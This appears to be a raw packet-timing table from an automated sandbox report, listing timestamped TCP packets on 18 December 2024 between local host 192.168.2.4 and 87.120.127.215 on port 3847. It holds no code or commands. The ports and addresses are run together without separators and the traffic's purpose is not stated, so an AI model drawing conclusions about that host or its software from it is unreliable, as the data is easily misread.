                                                                                                                                                Dec 18, 2024 19:27:42.911886930 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:43.031625986 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:43.031711102 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:43.151415110 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:43.437088013 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:43.439681053 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:43.561106920 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:43.561176062 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:43.680780888 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:43.967045069 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:43.967104912 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:43.967339039 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.000394106 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.000540972 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.000540972 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.000643015 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.120136023 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.120312929 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.120435953 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.120469093 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.120511055 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.120558977 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.120592117 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.120609999 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.120651960 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.120713949 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.120764971 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.120841980 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.120883942 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.120893002 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.120922089 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.120923996 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.120958090 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.121021986 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.121043921 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.121071100 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.121145010 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.121196985 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.121392012 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.240015984 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.240097046 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.240173101 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.240329027 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.240392923 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.240499973 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.240627050 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.240710974 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.240744114 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.240827084 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.240844965 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.240905046 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.240993023 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.241055012 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.241091013 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.241220951 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.241270065 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.241303921 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.241339922 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.241444111 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.241457939 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.241509914 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.360177994 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.361032963 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.361251116 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.361377001 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.361483097 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.361704111 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.361820936 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.361850977 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.361885071 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.361977100 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.362067938 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.362118959 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.362268925 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.362353086 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.362487078 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.362536907 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.428508997 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.428540945 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.428729057 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.833915949 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.868083000 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.868083000 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.868211985 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.868295908 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.868295908 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:44.994225025 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994246960 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994260073 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994364977 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994378090 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994476080 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994488955 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994502068 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994514942 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994528055 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994760036 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994774103 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994786024 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994806051 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:44.994924068 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.293315887 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.302891970 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:45.303040981 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:45.303097963 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:45.422636032 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.422665119 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.422698021 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:45.422795057 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.422832012 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.422899008 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.423046112 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.423059940 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.423082113 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.423094988 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.543155909 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.828092098 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:45.980228901 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:46.822350979 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:46.942883015 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:46.942950964 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:47.063395023 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:47.366784096 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:47.366924047 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:47.366960049 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:47.367144108 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:47.367198944 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:47.368549109 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:47.368613958 CET499013847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:47.486809015 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:47.486843109 CET38474990187.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:52.369451046 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:52.489237070 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:52.489345074 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:52.489448071 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:52.609247923 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:53.745268106 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:53.745346069 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:53.745404959 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:53.754245996 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:53.874031067 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:54.160075903 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:54.160285950 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:54.279962063 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:54.614666939 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:54.617468119 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:54.740268946 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:54.740365028 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:54.862945080 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.153153896 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.156017065 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.278434992 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.278484106 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.398255110 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.683393002 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.696321964 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.696341038 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.696352005 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.696403980 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.696429014 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.696450949 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.696580887 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.696621895 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.704503059 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.704566956 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.704612970 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.710309029 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.710412979 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.710509062 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.718944073 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.719064951 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.719105959 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.723664045 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.723766088 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.723812103 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.732145071 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.775394917 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.816745043 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.816777945 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.816836119 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.888381004 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.888431072 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.888513088 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.892488003 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.892627001 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.892676115 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.900402069 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.900747061 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.900790930 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.908060074 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.908243895 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.908376932 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.916157007 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.916184902 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.916280031 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.924127102 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.924211025 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.924254894 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.932120085 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.932362080 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.932405949 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.940160036 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.940275908 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.940407038 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.948179960 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.948396921 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.948451042 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.956177950 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.956343889 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.956437111 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.962285995 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.962387085 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.965696096 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.968300104 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.968370914 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.969572067 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.974313021 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.974451065 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:55.974555969 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:55.980263948 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.080801010 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.080902100 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.080931902 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.083268881 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.083425045 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.083431005 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.088144064 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.088284016 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.088299990 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.092991114 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.093128920 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.093167067 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.097913980 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.097969055 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.098025084 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.102943897 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.103034973 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.103050947 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.107136965 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.107222080 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.107243061 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.111363888 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.111458063 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.111572981 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.115598917 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.115657091 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.115691900 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.119895935 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.119960070 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.120094061 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.124110937 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.124172926 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.124211073 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.128343105 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.128456116 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.128458023 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.132802010 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.132855892 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.132864952 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.136934996 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.137023926 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.137028933 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.141050100 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.141185999 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.141231060 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.145294905 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.145406008 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.145463943 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.149610996 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.149679899 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.149730921 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.153793097 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.153853893 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.153882980 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.158163071 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.158269882 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.158294916 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.162306070 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.162379980 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.162400961 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.167023897 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.167164087 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.167258978 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.171747923 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.171821117 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.171845913 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.175209999 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.175302982 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.175374985 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.179326057 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.179413080 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.179505110 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.183680058 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.183895111 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.183984041 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.187724113 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.188055992 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.273516893 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.273534060 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.273612976 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.275357008 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.275499105 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.275567055 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.278882980 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.278958082 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.279046059 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:56.282465935 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:56.282577038 CET38474992787.120.127.215192.168.2.4
